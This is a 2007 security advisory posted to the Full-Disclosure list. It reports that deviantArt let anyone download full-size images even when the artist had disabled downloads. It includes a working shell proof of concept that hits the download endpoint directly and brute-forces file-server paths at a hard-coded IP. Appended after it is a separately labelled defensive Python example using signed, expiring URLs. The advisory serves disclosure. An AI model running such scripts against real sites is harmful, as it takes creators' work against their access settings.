Security Advisory
-----------------

Title: deviantArt does not check authorization for image download
Risk Rating: High
Platforms: Any
Author: Timothy Redaelli <tredaelli@xxxxxxxxxxxxx>
Date: 27-06-2007

Overview
--------

deviantArt does not apply any type of authorization checking for full-size image download.

Details
-------

It is possible to download the full-size (as uploaded) image even if the Download button is disabled.

Proof of Concept
----------------

#!/bin/sh
# Copyright (c) 2007 Timothy Redaelli <tredaelli@xxxxxxxxxxxxx>

URL=$1

download() {
	wget -U "" -nv "$@"
}

parse() {
	# First try the download endpoint directly; it serves the file without any authorization check.
	wget -U "" http://www.deviantart.com/download/"$URL"/ && exit 0
	# Otherwise take the "fullview" URL from the page data and enumerate the two
	# hex path components of the file server (0-15 instead of 0xF, which is not portable awk).
	URLS=$(wget -qU "" -O - http://www.deviantart.com/deviation/"$URL"/ |
		fgrep 'deviantART.pageData' |
		sed -e 's/^.*"fullview": {[^}]*"\(http[^"]*\).*$/\1/' -e 's/\\//g' |
		awk -F / '{for (i = 0; i <= 15; i++) for (j = 0; j <= 15; j++) printf "http://69.28.181.52/%s/f/%s/%s/%x/%x/%s\n", $4, $6, $7, i, j, $10}')
}

parse "$1"

echo "$URLS" | while read x; do
	download "$x" && exit 0
done

Timeline
--------

Mar 26, 2007 -- Bug discovery.
Mar 27, 2007 -- Contact deviantArt, no reply.
Jun 26, 2007 -- Recontact deviantArt, still no reply.
Jun 27, 2007 -- Bug published.

Credits
-------

* Timothy Redaelli <tredaelli@xxxxxxxxxxxxx>

--
Timothy Redaelli
http://timothyredaelli.wordpress.com/
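A defender-side counterpart to the two weaknesses the advisory's proof of concept relies on, added here as an example and not part of the advisory or of deviantArt's code: the download endpoint checks the deviation's download setting and ownership before issuing a short-lived HMAC-signed URL, and the file store serves only requests whose signature matches the path and expiry, so guessing storage paths yields nothing. The deviation records, signing key and hostname are constructed for the example.

```python
import hmac
import hashlib
import time
from urllib.parse import urlencode, parse_qs, urlparse

# Constructed sample data standing in for a site's deviation records.
SECRET = b"constructed-server-secret"  # hypothetical signing key, kept server-side
DEVIATIONS = {
    "42": {"owner": "alice", "downloads_enabled": False, "path": "/f/alice/42/full.jpg"},
    "43": {"owner": "bob", "downloads_enabled": True, "path": "/f/bob/43/full.jpg"},
}


def sign(path, expires):
    """HMAC over the storage path and expiry time; only the server knows SECRET."""
    msg = f"{path}|{expires}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def download_url(deviation_id, requester, now=None, ttl=300):
    """Authorization gate: the owner always may download; others only when the
    artist enabled downloads. Returns None when access is refused."""
    dev = DEVIATIONS.get(deviation_id)
    if dev is None:
        return None
    if not (dev["downloads_enabled"] or requester == dev["owner"]):
        return None
    expires = int(now if now is not None else time.time()) + ttl
    q = urlencode({"expires": expires, "sig": sign(dev["path"], expires)})
    return f"https://files.example.invalid{dev['path']}?{q}"


def storage_serve(url, now=None):
    """File-store side: serve only if the signature covers this exact path and
    expiry and the link has not expired. Enumerated paths carry no valid signature."""
    u = urlparse(url)
    q = parse_qs(u.query)
    try:
        expires = int(q["expires"][0])
        sig = q["sig"][0]
    except (KeyError, ValueError):
        return False
    current = now if now is not None else time.time()
    if current > expires:
        return False
    return hmac.compare_digest(sig, sign(u.path, expires))
```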
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/